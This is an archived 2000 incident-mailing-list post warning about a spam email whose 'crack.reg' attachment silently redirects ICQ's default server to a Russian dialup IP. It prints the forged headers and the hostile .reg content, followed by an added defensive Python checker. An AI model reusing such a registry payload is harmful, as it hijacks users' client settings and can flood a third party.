Security Incidents mailing list archives

Re: CRACK


From: oogali () INTRANOVA NET (Omachonu Ogali)
Date: Thu, 25 May 2000 09:45:31 -0400


Yesterday, an e-mail was sent to a mailing list I'm subscribed to with a
subject of 'CRACK' and an attachment of 'crack.reg'. After looking into
it, you can see that the headers were forged, and that the attachment edits
your ICQ preferences in the registry and makes your default server a
dialup victim/client in Russia.

Headers:
-- snip --
Return-Path: <owner-freebsd-jobs () FreeBSD ORG>
Delivered-To: oogali () hydrant intranova net
Received: from intranova.net (blacklisted.intranova.net [209.3.31.70])
        by hydrant.intranova.net (Postfix) with SMTP id 33F73E1368
        for <oogali () hydrant intranova net>; Thu, 25 May 2000 00:12:21 -0400
Received: (qmail 14575 invoked by uid 1001); 24 May 2000 21:03:15 -0000
Delivered-To: oogali () intranova net
Received: (qmail 14567 invoked from network); 24 May 2000 21:03:14 -0000
Received: from hub.freebsd.org (204.216.27.18)
  by blacklisted.intranova.net with SMTP; 24 May 2000 21:03:14 -0000
Received: by hub.freebsd.org (Postfix, from userid 538)
        id 0698B37B710; Wed, 24 May 2000 14:04:19 -0700 (PDT)
Received: from localhost (localhost [127.0.0.1])
        by hub.freebsd.org (Postfix) with SMTP
        id 004672E8163; Wed, 24 May 2000 14:04:18 -0700 (PDT)
        (envelope-from owner-freebsd-jobs)
Received: by hub.freebsd.org (bulk_mailer v1.12); Wed,
     24 May 2000 14:04:18 -0700
Delivered-To: freebsd-jobs () freebsd org
Received: from demos.su (mx.demos.su [194.87.0.32])
        by hub.freebsd.org (Postfix) with ESMTP id EC47637BD6F
        for <jobs () freebsd org>; Wed, 24 May 2000 14:04:12 -0700 (PDT)
        (envelope-from ppbsereb%geisteskrank.demos.su () sinbin demos su)
Received: from sinbin.demos.su ([194.87.5.31] verified)
  by demos.su (CommuniGate Pro SMTP 3.2.4)
  with SMTP id 6364870 for jobs () freebsd org; Thu, 25 May 2000 01:04:10 +0400
Received: from geisteskrank.demos.su by sinbin.demos.su with ESMTP id BAA44176;
        (8.6.12/D) Thu, 25 May 2000 01:03:03 +0400
Received: from rcomputer by geisteskrank.demos.su with SMTP id BAA61511;
  (8.9.3/D) Thu, 25 May 2000 01:02:32 +0400 (MSD)
Message-Id: <200005242102.BAA61511 () geisteskrank demos su>
From: "zulti () hotmail com" <zulti () hotmail com>
To: <jobs () freebsd org>
Subject: CRACK
Date: Thu, 25 May 2000 01:01:38  ^? ()
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="----=_NextPart_000_01F6_01BF2E09.23F97E80"
X-Priority: 1
X-MSMail-Priority: High
X-Mailer: 'WE' Group Spamer
Sender: owner-freebsd-jobs () FreeBSD ORG
X-Loop: FreeBSD.org
Precedence: bulk
-- snip --

Attachment:
-- snip --
REGEDIT4
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\DefaultPrefs]
"Default Server Port"=dword:00001446
"Default Server Host"="195.133.10.234"
-- snip --

-- snip --
Server:  localhost.intranova.net
Address:  127.0.0.1

Name:    234.10.133.195.dynamic.dialup.ru
Address:  195.133.10.234
-- snip --

Once again, the problem here is people opening attachments without taking
a look at them.  Thank God this isn't a self-replicating e-mail, but it
presents a Denial-of-Service attack against this Russian dialup. In
conclusion...heads up!

--
+-------------------------------------------------------------------------+
| Omachonu Ogali                                     oogali () intranova net |
| Intranova Networking Group                 http://tribune.intranova.net |
| PGP Key ID:                                                  0xBFE60839 |
| PGP Fingerprint:       C8 51 14 FD 2A 87 53 D1  E3 AA 12 12 01 93 BD 34 |
+-------------------------------------------------------------------------+
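The following is an added example, not code from the original post or from its author: a small Python checker for the two things the post shows, a REGEDIT4 attachment that repoints the ICQ client's default server, and a Received: chain that reveals the real first hop behind a forged From: line. The sample .reg text and header lines are transcribed from the post; the list of watched registry keys and the function names are assumptions made for this illustration.

```python
"""Scan a .reg attachment and a Received: chain the way a mail filter or an
incident responder might (added example; sample data transcribed from the
post, watched-key list and function names are this example's own choices)."""
import re
from typing import Dict, List, Tuple

# Registry keys a mailed .reg file should never write (assumption: built
# around the single key the post's attachment touches; compared lowercase).
WATCHED_KEYS = {
    r"hkey_current_user\software\mirabilis\icq\defaultprefs",
}

# Attachment from the post, verbatim.
REG_SAMPLE = r"""REGEDIT4
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\DefaultPrefs]
"Default Server Port"=dword:00001446
"Default Server Host"="195.133.10.234"
"""

# Received: headers from the post (folded continuation lines kept), minus
# the qmail local-delivery hops that carry no "from ... by ..." pair.
HEADERS_SAMPLE = """Received: from intranova.net (blacklisted.intranova.net [209.3.31.70])
        by hydrant.intranova.net (Postfix) with SMTP id 33F73E1368
Received: from hub.freebsd.org (204.216.27.18)
  by blacklisted.intranova.net with SMTP; 24 May 2000 21:03:14 -0000
Received: from demos.su (mx.demos.su [194.87.0.32])
        by hub.freebsd.org (Postfix) with ESMTP id EC47637BD6F
Received: from sinbin.demos.su ([194.87.5.31] verified)
  by demos.su (CommuniGate Pro SMTP 3.2.4)
Received: from geisteskrank.demos.su by sinbin.demos.su with ESMTP id BAA44176;
Received: from rcomputer by geisteskrank.demos.su with SMTP id BAA61511;
"""


def parse_reg(text: str) -> Dict[str, Dict[str, Tuple[str, object]]]:
    """Parse a REGEDIT4 file into {key: {value_name: (type, value)}}.
    Handles the two value forms used in the attachment: quoted strings and
    dword:XXXXXXXX (hex, decoded to int). Anything else is kept raw."""
    if not text.lstrip().startswith("REGEDIT4"):
        raise ValueError("not a REGEDIT4 file")
    result: Dict[str, Dict[str, Tuple[str, object]]] = {}
    current = None
    for line in text.splitlines()[1:]:
        line = line.strip()
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            result.setdefault(current, {})
            continue
        m = re.match(r'^"([^"]+)"=(.*)$', line)
        if not m or current is None:
            continue
        name, raw = m.group(1), m.group(2)
        if raw.startswith("dword:"):
            result[current][name] = ("dword", int(raw[6:], 16))
        elif raw.startswith('"') and raw.endswith('"'):
            result[current][name] = ("string", raw[1:-1])
        else:
            result[current][name] = ("raw", raw)
    return result


def find_watched_writes(reg) -> List[Tuple[str, str, object]]:
    """Return (key, value_name, value) for every write under a watched key."""
    hits = []
    for key, values in reg.items():
        if key.lower() in WATCHED_KEYS:
            for name, (_, val) in values.items():
                hits.append((key, name, val))
    return hits


def received_chain(headers: str) -> List[Tuple[str, str]]:
    """Unfold the headers and return (from_host, by_host) for each Received:
    line, oldest hop first, so chain[0] is the hop closest to the sender."""
    unfolded = re.sub(r"\r?\n[ \t]+", " ", headers)
    hops = []
    for line in unfolded.splitlines():
        if not line.lower().startswith("received:"):
            continue
        m = re.search(r"from\s+(\S+).*?\bby\s+(\S+)", line, re.IGNORECASE)
        if m:
            hops.append((m.group(1), m.group(2)))
    return list(reversed(hops))


if __name__ == "__main__":
    for key, name, val in find_watched_writes(parse_reg(REG_SAMPLE)):
        print(f"attachment writes {key}\\{name} = {val!r}")
    origin, relay = received_chain(HEADERS_SAMPLE)[0]
    print(f"first hop: {origin} via {relay}")
```

Running it reports the host/port rewrite (the dword decodes to port 5190) and shows that the first hop is `rcomputer` handing off to `geisteskrank.demos.su`, not the hotmail address in From: or the FreeBSD list hub that later relayed the message.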
